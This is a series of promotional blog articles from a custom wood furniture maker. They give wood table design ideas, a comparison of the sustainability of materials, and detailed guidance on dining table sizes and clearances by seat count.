Quality is also an important factor: solid wood tables last much longer than low-quality wood composites, and are more environmental as composites usually contain harmful products, like glue and synthetic materials. Some question whether the extra cost of solid wood is worth it, especially with today’s market flooded with cheaper, low-end alternatives, such as veneer, metal or plastic furniture. Solid wood furniture, however, is the only material that ensures longevity, due to easy maintenance. Signs of wear and tear or damage to a wooden table can be easily sanded out, and maintenance is as simple as reapplications of oil. It is also the most sustainable furniture choice when compared to plastic or metal furniture.

Below are some tips for narrowing down your wood table ideas, plus images showing wooden table ideas incorporating modern design. You can also read how to calculate the right dining table size for your room, standard table and chair heights, or counter and bar stool heights for a modern look.

Wood Table Ideas & Images

Wood table idea

Wooden tables can be made with natural wood slabs or panels of solid wood (see image below), and modernized with a range of sleek wooden bases or metal structures.

When calculating your ideal wood table size, you should allow a minimum size of 32–36 inches (80–90cm) between your table and the wall or any obstructions. This is also a comfortable size needed for someone to push back their chair. If you have furniture along the wall, start your measurements from the edge of the furniture instead. Other obstructions to consider are door frames, fireplaces and windows.

The ideal distance for an elegant look, however, is estimated at around 42 to 48 inches (107–122cm) from the wall or furniture. It is advised not to exceed a maximum of 70 inches (180cm) between the table and the wall – instead choose a larger table to fill the space for better visual balance.

In terms of seating space per person, the minimum space required is around 24 inches (60cm), although up to 30 inches (80cm) per person allows more elbow room. If you choose a rectangular table, you also need to add a minimum of 12 inches (30cm) up to 24–30 inches (60–80cm) at either end, to allow enough leg room for two extra spaces.

You will need a minimum space of at least 24 inches (60cm) behind a chair when it is pushed in, which is the minimum amount needed for someone to pass.

Your total table size should also account extra space for table leg width. If you have a smaller room, opt for wooden table ideas that have thin legs or a central pedestal base.

Wood Furniture Ideas

Solid Wood Table Top Ideas

Natural cuts made from solid wood create truly one-of-a-kind wooden table ideas, relying on the unique patterns and live edge borders that only Mother Nature can provide. Solid wood tables are sometimes associated with rustic-style furniture, however, PAROTAS uses a variety of design bases to modernize wooden table top slabs.

When calculating the ideal height for your base structure, allow room for at least the standard chair height, typically around 18 inches (45cm) – from floor to chair seat – plus lap room. A comfortable fit between the chair seat and a wooden table top is calculated at around 12 inches (30cm).

If you’re choosing between a round or rectangular natural wood table, you should consider the room size and the desired seating amount.

Rectangular table tops work better in long narrow rooms to create visual space. If you need to save space, you can add a wooden bench on at least one side, or both, which can be pushed under the table to allow more walking room.

Circular tables are ideal for small spaces for allowing better flow around the table, plus more people can fit without corners, especially if the table has a pedestal base.

Some people prefer oval or rectangular tables for seating large groups, as wide circular tables can make it difficult to reach food in the middle – although a built-in lazy susan can resolve this.

In a square room, a round or square table creates the best visual balance, as well as allowing a more intimate dining atmosphere as everyone is the same distance apart and facing each other. Similar to circular tables, however, large square tables can make it difficult to reach for food.

Solid Wood Coffee Table Ideas

Wood Table Top Ideas

Modern Wood Dining Table Ideas

If you’re specifically looking at dining table ideas, you should first calculate the number of people you want to seat and the kind of plate setting.

The minimum depth to fit a dining plate and cutlery is around 15 inches (38cm; without glass space), or 18 inches (45cm) for a full cutlery and plate setting with glasses. You should ideally add an additional 10–12 inches (25–30cm) to fit serving dishes, although 6 inches (15cm) is the minimum and sufficient if you move glasses. This puts the ideal table width at around 41 inches (105cm), with 47 inches (120cm) being a more comfortable width.

A walkway of 36 to 42 inches (91–107 centimeters) around the entire table is the most comfortable space needed when chairs are occupied and people want to pass. However, if your table will be in an open plan room with circulation routes, then leaving from 48 to 60 inches (122–152cm) beyond the edge of a table is suitable for this type of layout.

If space is an issue, using chairs without arms or swivel seats will be more comfortable for guests. Another tip to make a small area seem more spacious is to use transparent, acrylic chairs.

Round tables are also one of the best choices for small spaces. With no sharp corners to bump into, round tables can fit into tight spaces and typically squeeze in more people. Round tables also create the most intimate atmosphere, as everyone can interact without having to lean over anybody. But for entertaining big crowds, large round tables are less ideal, as sound doesn’t travel as well across a huge diameter; in that case rectangular tables can be ideal.

Wood Dining Table Ideas

Wood Coffee Table Ideas

The same basic spacing principles for dining tables apply to wooden coffee tables: make sure you leave enough space for people to pass and that there is enough space between your coffee table and the closest obstruction, such as a sofa.

The easiest design rule is to keep the proportions similar between your table and the room. Long, narrow rooms work best with rectangular tables, while round and square tables fit best with square rooms.

If you have a very large room, try to also allow a more generous clearance space, even up to 48–54 inches (122–137cm).

Wood Coffee Table Ideas

Glass Wood Coffee Table Ideas

Wooden Table Leg Ideas

Solid wood tables generally require sufficient support to bear the weight, although minimalist base designs are still possible. Choosing a lighter wood – for example, parota is almost half the dried weight of oak – can provide more flexibility in designing table legs.

You also need to account for the ‘apron’ – the panel hanging underneath the table top. If you have a low apron, guests might not be able to cross their legs, or you would need to choose lower chairs. Aprons, however, can be beautifully incorporated into your table design idea. At PAROTAS, we custom design table aprons so they add to the overall modern design idea.

The position and size of your metal or wooden table legs also influence the space you need. Larger or obstructive table legs naturally limit the seating space. If space is an issue, pedestal bases in the center are an ideal choice for offering the most legroom, and you might be able to squeeze in an extra seat.

Wooden furniture ideas

Wood Table Leg Ideas

Custom Wooden Table Ideas

Every space is different. Custom wood furniture is the ideal solution for achieving perfect visual balance in a room, allowing you to match natural wood cuts to fit unique spaces in your design. For custom home furniture and contract projects, PAROTAS’ team of carpenters, architects and designers bring together their expertise to turn custom wooden ideas into reality, offering advice on the best solutions for your space and viability of your design. If you have a wooden table idea or design project, contact us for a quote.

 

© Parotas.com

PAROTAS brings together carpenters, designers and architects to find sustainable ways to produce custom wooden furniture. Our carpenters employ specialised techniques to reduce wood waste during production. All wood is certified. Contact PAROTAS to ask about your custom wooden furniture or design project.


 

What Is the Most Sustainable Material – for Building, Furniture and Design Projects?

Which are the most sustainable materials to use? Designers are increasingly considering environmental aspects in their projects, finding ways to reduce their carbon footprint and make better choices when choosing sustainable materials. Today there are certifications and eco-labels to help both designers and consumers identify sustainable materials in the market. However, as eco-labels are still far from being the norm, how can you intrinsically know what is a sustainable material? Below you can find out the environmental impacts of different building, furniture and design materials.

Sustainable materials

PAROTAS has created the infographic below looking at the environmental impact of different materials commonly used in building, furniture and design projects, including plastic, concrete, metal and wood design. The answer to which is the most sustainable material may surprise you!

Most Sustainable Materials

 

However, the real picture of each sustainable material is much more complex, and some companies instead find ways to offset their carbon footprint in contrast to finding alternative production materials.

The energy used and pollution output can also vary depending on the material type (for example, there is a wide variety of plastics) and whether it is made from recycled or reused resources, as is common with steel, aluminium and plastic, which decreases the energy required and boosts their position as a sustainable material.

In all cases, your environmental impact can be reduced by reusing or reclaiming resources, which is one of the most sustainable options in design. If required to use new furniture or materials, then high quality products are the most sustainable materials, particularly if you can reuse or recycle them in future.

Feel free to share our infographic, provided you include a link to the CC-licence, original post and to www.parotas.com.

 

© Parotas.com

PAROTAS brings together carpenters, designers and architects to find sustainable ways to produce wooden furniture. Our carpenters employ specialised techniques to reduce wood waste during production, as well as re-use all offcuts and by-products. All wood is certified. You can contact PAROTAS to ask about your custom wooden furniture or design project.

How to Calculate the Best Dining Table Size for Your Room

What is the exact dining table size you need to create visual balance in your design?

Before starting your furniture search, you should calculate the range of dining table sizes that can fit in your room based on design principles, which can vary between round, square and rectangle table sizes. Besides considering how many people you want to seat, your dining table size also needs to allow enough space for people to pass, fit a dining setting, and be proportional to the room size to create visual balance.

If you need help calculating your dining table size, contact PAROTAS to ask what would be the best table design for your space and seating requirements. You can also read how to calculate the ideal chair and table height, or see a list of standard bar and counter stool heights.

Dining table size guide

Calculate the minimum and maximum dining table size for your room dimensions, taking into account:

  • Dining table size compared to room size
  • Dining table size compared to rug size
  • Standard dining table height and chair height
  • Calculate dining table size by seating
  • 2 seater dining table size
  • 4 seater dining table size
  • 6 seater dining table size
  • 8 seater dining table size
  • 10 seater dining table size
  • 12 seater dining table size
  • Round, square and rectangle dining table sizes

 

Dining Table Size

What dining table size should I buy?

Before deciding how many people you want to seat, you will need to see what size dining table will actually fit into the space you have, taking into account walls, walkways and other furniture.

To ensure you have adequate room around a dining table, a minimum of 30–36 inches (76cm) is required for clearance space, measured from the nearest obstruction, whether it be a wall, door, window or furniture. However, a 30-inch space around your dining table can still create a tight fit if people need to get up during the meal.

For a more comfortable space around your dining table size, opt for up to 42–48 inches (122cm), which also creates an elegantly proportioned room.

To ensure you don’t choose a dining table size that is too small for your room, don’t leave more than 6ft (183cm) from the edge of the room, at least on one side.

When deciding on your ideal dining table size, consider that ‘less is more’ if you’re looking for a comfortable, spacious room. Taking into account these measures, you might find switching from a 10-seater to an 8-seater dining table size creates a better fit, for example, or from a rectangle to a round dining table size. Another option is to choose a table with fold-out leaves – ideal if you only host large groups occasionally – provided it still fits when expanded.

When deciding between a square, rectangle or round dining table size, your choice should be proportional to the shape of the room but also the amount you want to seat. For example, conversation can become difficult with tables measuring more than 7 feet wide (2m, similar to the distance that applies to the conversation area in a living room), which is what you would need if you’re considering a round or square table to seat more than eight. The bigger the table, the more dining parties are restricted to conversations with the person next to them, rather than across the table. In some cases, it can be better to consider an alternate shape, for example, a rectangle dining table size.

If you want to visualize the space your table will take, a tip is to place a sheet on the ground or create an outline with masking tape.

To give an example, in a room measuring 10 x 12 feet (3 x 3.6m), it would be possible to fit a rectangle table size of 36–42 inches wide (91–107cm) and up to 60–70 inches long (152 x 178cm), or a square or round table size of around 48 inches in diameter (122cm), allowing for additional furniture along one wall.

Dining table size compared to rug size

If you’re matching a table with a rug, you will need to make sure the rug is at least 30 inches longer than your dining table size on each side where there will be chairs.

If you use a rug 30-inches longer than your table – thus occupying the recommended space for free movement – then you should try to allow for at least 48 inches from your table to the wall to create visual balance.

Dining table height

Even though dining table designs vary considerably, the standard dining table height is usually pretty consistent. You need to ensure there is enough space for people to fit – and cross – their legs, without being too high that it becomes uncomfortable to eat. In general, you should leave at least 12 inches (30cm) between your chair seat and the tabletop.

Standard dining table heights range from 28 to 30 inches (71–76cm), which should be matched with a chair height of 18 to 23 inches (46–58cm, from floor to seat top), benches or stools. The shape of your table, however, can influence your chair and dining table height. Some tables have a support on the underside, which increases the distance required for legs.

If you’re considering a counter-height table, where people might stand or sit on high wooden stools, the standard dining table height is 34–36 inches (86–91cm) and should be used with chairs measuring 24–26 inches (61–66cm) from floor to seat.

If you opt for a bar table, standard table heights range up to 40–42 inches (102–117cm), with stools ranging from 28–30 inches (71–76cm).

Dining table size based on seating

Each person needs a minimum of around 24 inches (61cm) to eat comfortably, although some tables and chair designs (such as wooden benches) can allow more people to squeeze in when required. However, for a comfortable table surface, consider up to 28–30 inches (71–76cm) for more elbow room, especially if you have chairs with armrests or wide seats. In rectangular tables, you also need to calculate an extra 12 inches (30cm) for each end if you want to place seating at the head and foot of the table.

You will also need to consider the minimum depth required for a dining setting, plus some space for a shared area to place food, condiments or candles. To fit a basic plate setting allow for a minimum of 15 inches (38cm) deep, plus a minimum of around 5 inches (13 cm) for shared space (per person, or double for full table calculations).

To allow more room for your guests, as well as enough space for a full dining setting (including a bread plate and two glasses), then consider a table space of 30 inches wide (76cm) and 18 inches deep (46 cm), with a shared space of up to 9 inches (23cm) per person.

Be careful not to create too much distance, though; large round tables, for example, can make it difficult to reach food, while rectangular shapes can work better for seating large groups. If you do opt for a round table wider than 60 inches in diameter (152cm), you might consider adding a lazy susan to your table design.

Using the above dimensions, a rectangular dining table size for six would be calculated at around 78 x 40 inches (203 x 102cm), or 96 x 54 inches (244 x 137cm) for a more comfortable setting.

If you don’t plan to put food or decorations on the table – for example you have a side console table – or don’t mind moving glasses around, then there’s no need for calculating in shared space. If you sacrifice shared space, it’s possible to create a dining table size as narrow as 36 inches (91cm), which is still enough space to put a bottle of wine and some candles, while a sideboard can be used to serve food. In a restaurant, for example, you will often find tables around 36 inches wide (91cm) with very little sharing space.

6 seater dining table size: Before calculating what size dining table you need, you need to decide if you want to fit in extra seating at the head and end of the table.

What size dining table?

Dining table sizes vary depending on the furniture design. You may be able to fit more people by considering an alternate arrangement, for example, switching from a square to a round dining table.

Below you can see size requirements based on square, rectangle and round dining table sizes, and tips to help you choose which shape would work best based on the seating you want.

2 seater dining table size

The measurements for a two-seater square table need to account for shared space, putting the minimum dining table size at 31 inches (79cm), while a rectangle table for two would need at least 42 x 31 inches (110 x 70cm). If you opted for a 36-inch (3ft; 91cm) round table, however, you could comfortably sit up to three people.

4 seater dining table size

Round dining table size for four

The standard dining table size for four averages 36 to 40 inches (3–4ft; 91–102cm), although a 4-foot round table (102cm) can also squeeze six seats when needed.

While the minimum round dining table size for four starts at 36 inches, a pedestal base works best to allow more room. To allow more room for chairs and leg space, especially if there are table legs, the ideal round dining table size for four is 48–50 inches (4ft; 122cm–127cm).

Square dining table size for four

The ideal four-seater square dining table size is around 43 inches (3ft; 107cm). Similar to a round table, the minimum dining table size can be as low as 36 inches (3ft; 91cm), although you should allow more room – up to 50 inches (4ft; 122cm) – for a better fit and if you have wide table legs. Going up to 60 inches (5ft; 152cm) will allow you to choose between four to six seats.

Rectangle dining table size for four

The comfortable average to seat four is around 60 x 31 inches (152 x 79cm), although this rectangle dining table size could also squeeze six with the right table and chair designs.

To fit four diners on two opposite sides (ie. excluding head and table settings), the minimum area would be 48 inches long by 36 inches wide (122 x 76cm). To sit one diner at each end, the minimum space required would be 48 x 36 inches (122 x 91cm), or 60 x 55 inches (152 x 137cm) for the ideal, comfortable fit.

6 seater dining table size

Round dining table size for six

You will need at least 48 to 60 inches in diameter (4–5ft; 122–152cm) to seat six at a round table, working best with a pedestal base. It is possible to create a tight 6-seater round dining table with a diameter of 44–54 inches, but aiming for 54–­60 inches is a more comfortable fit and may even squeeze in eight.

The minimum round dining table size for six calculates to around 55 inches (140cm), although an ideal size would be 72 inches (6ft; 183cm). From about 60 inches (5ft; 152cm), you can start to squeeze in around seven to eight people, and with a minimal table design a 6-foot table could squeeze up to eight or nine when required.

Square dining table size for six

You will need at least 48 to 60 inches in diameter (4–5ft; 122–152cm) to squeeze in six at a square table (see table measurements for four and eight-seater tables).

Rectangle dining table size for six

It is possible to squeeze six people around a table measuring from 60–72 inches long (5–6ft) and 31–36 inches wide (152cm–183cm x 79–91cm).

To fit six without any diners at either end, the minimum dining table size for six would be 72 x 31 inches (6ft x 2’6″; 183 x 76cm). To calculate enough space for diners at the head and foot of the table, the minimum size is 79 x 36 inches (6’6″ x 3ft; 198cm x 91cm), although to avoid any overlap in dining settings you would need at least 96 x 55 inches (8ft x 4’6″; 244 x 137cm).

8 seater dining table size: When calculating if you can fit an 8 or 10 seater dining table size, you need to add extra space for the legs.

8 seater dining table size 

Round dining table size for eight

The average round dining table size for eight is 72 inches in diameter (6ft; 183cm), although anywhere from 54–60 inches (5ft; 137–152cm) can fit six to eight people. Depending on the design, it is possible to squeeze seven to nine seats on round tables measuring anywhere from 5–7 ft.

The minimum required size is around 5ft (152cm), working best with a pedestal base or simple legs, otherwise the ideal size to allow a full plate setting would be around 7ft (213cm).

Square dining table size for eight

The minimum square, eight-seater dining table size is around 6ft (183cm), although 7ft (214cm) is the ideal size; both sizes, however, can squeeze up to 10 seats.

You could also squeeze up to 12 people around a 7ft table; for a larger square dining table size, you might consider a rectangular dining table so guests aren’t so far from each other.

Rectangle dining table size for eight

Dining table sizes for eight can range from 72 to 96 inches long by 36 to 43 inches wide (6–8ft x 3ft–3’6″; 183–244cm x 91–110cm), with the lower measurements also a comfortable fit for six seats and the higher measurements suitable to squeeze 10 people. The general standard you’ll come across, though, will be around 78 inches long by 36 inches wide for an eight-seater rectangle dining table size.

With a table of 96 x 29 inches (8ft x 2’6″; 244cm x 76cm), four diners can fit along each side, although you would need at least 103 x 36 inches (8’6″ x 3ft; 259 x 91cm) if you wanted to sit three side-by-side and two diners at each end. The ideal size for the latter arrangement, however, would be 127 x  55 inches (10’6″ x 4’6″; 323 x 140cm).

10 seater dining table size 

Round dining table size for 10

From around 84 inches (7ft; 213cm), you can fit nine to 11 people, while a 96-inch table (8ft; 244cm) could squeeze from 10 up to 12.

If calculating by plate setting space, the minimum requirement is 7ft (or from around 183cm), while a comfortable size calculates to around 8ft (244cm).

Square dining table size for 10

With the right table and chair design, you could squeeze 10 people onto a square table measuring from 6–8 foot in diameter. Larger than 7ft, however, distances start to get a little far for reaching dishes, although a lazy susan can be added in.

Rectangle dining table size for 10

It is possible to fit 10 seats on a rectangle table size of 8–10 feet x 3’6″–4’6″ (244–305cm x 110–140cm).

To seat 10, five side-by-side, you should aim for a minimum length of 10 feet and width of 2 feet 6 inches (305 x 76cm). If you want to include a head and foot setting, aim for 10’6″ x 3 feet (323 x 91cm), or ideally 11′ 6″ x 4’6″ (354 x 140cm) for generous seating space.

12 seater dining table size 

Round dining table size for 12

With a diameter of 8 feet (244cm) you can comfortably fit 10 people, or squeeze in 12 with slightly less elbow space, while you would need around 9 feet in diameter (274cm) to spaciously sit 12 people. With a 9-foot table, you could comfortably fit a range of 11–14 settings, while a 10-foot table (305cm) could sit 12 to 15.

However, with diameters larger than 7 foot (or around 200cm), conversation and reaching for food can start to get difficult, so you might consider a rectangular arrangement.

Square dining table size for 12

A table of 84 inches (7ft; 214cm) could fit 12, although a more comfortable fit would be up to 96 inches in diameter (8ft; 244cm), which can sit anywhere from 8–12 people comfortably. You might find the distance of an 8-foot table, however, interferes with conversation. It is sometimes recommended to consider a rectangular arrangement if you require longer than 7 feet.

Rectangle dining table size for 12

The smallest rectangle dining table size needed to fit 12 seats would be around 120 x 55 inches (10ft x 4’6”; 305 x 140cm), which would also comfortably sit 10.

To seat six side-by-side, the minimum space required would be 144 x 31 inches (12ft x 2’6″; 366cm x 76cm). You can create a shorter table by seating two on each end, although you would need a minimum size of 127 x 48 inches (10’6″ x 4ft; 320 x 122cm) or ideally 139 x 60 inches (11’6″ x 5ft; 350 x 152cm).

Round Dining Table Size: A round dining table size can work well for six to eight people, as pictured above, but can get too large for conversation if you add space for 10 to 12 people.

Rectangle, oval, square and round table sizes

Below is a table showing the minimum dining table size requirements for each type of dining table shape (not including shared space).

| | 2 seater dining table size | 4 seater dining table size | 6 seater dining table size | 8 seater dining table size | 10 seater dining table size | 12 seater dining table size |
|---|---|---|---|---|---|---|
| Round dining table sizes | 2’6” (76cm) | 3ft (92cm) | 4’6” (137cm) | 5’ (152cm) | 7’ (183cm) | 8’ (244cm) |
| Rectangle/Oval dining table sizes | 2’x2’6” (61cmx76cm) | 4’x2’6” (122x76cm) | 6’x2’6” (183x76cm) | 8’x2’6” (244x76cm) | 10’x2’6” (305x76cm) | 12’x2’6” (366x76cm) |
| Square dining table sizes | 2’6” (76cm) (including shared space) | 3’ (92cm) | 3’–6’ (92cm–183cm) | 6’ (183cm) | 7’ (214cm) | 7’ (214cm) |

If you need help calculating your dining table size, send an email to PAROTAS and we’ll be happy to help.

 

© Parotas.com

PAROTAS brings together carpenters, designers and architects to make custom parota wood furniture of even the most ambitious modern designs. The parota tree can be sustainably sourced in its native regions in Mexico and Central America, where it thrives in humid zones. Read more on the sustainability of parota (guanacaste) and the qualities of parota wood or contact PAROTAS to ask about your custom design. You can see the unique colour and grain of parota on our page on live edge wood.
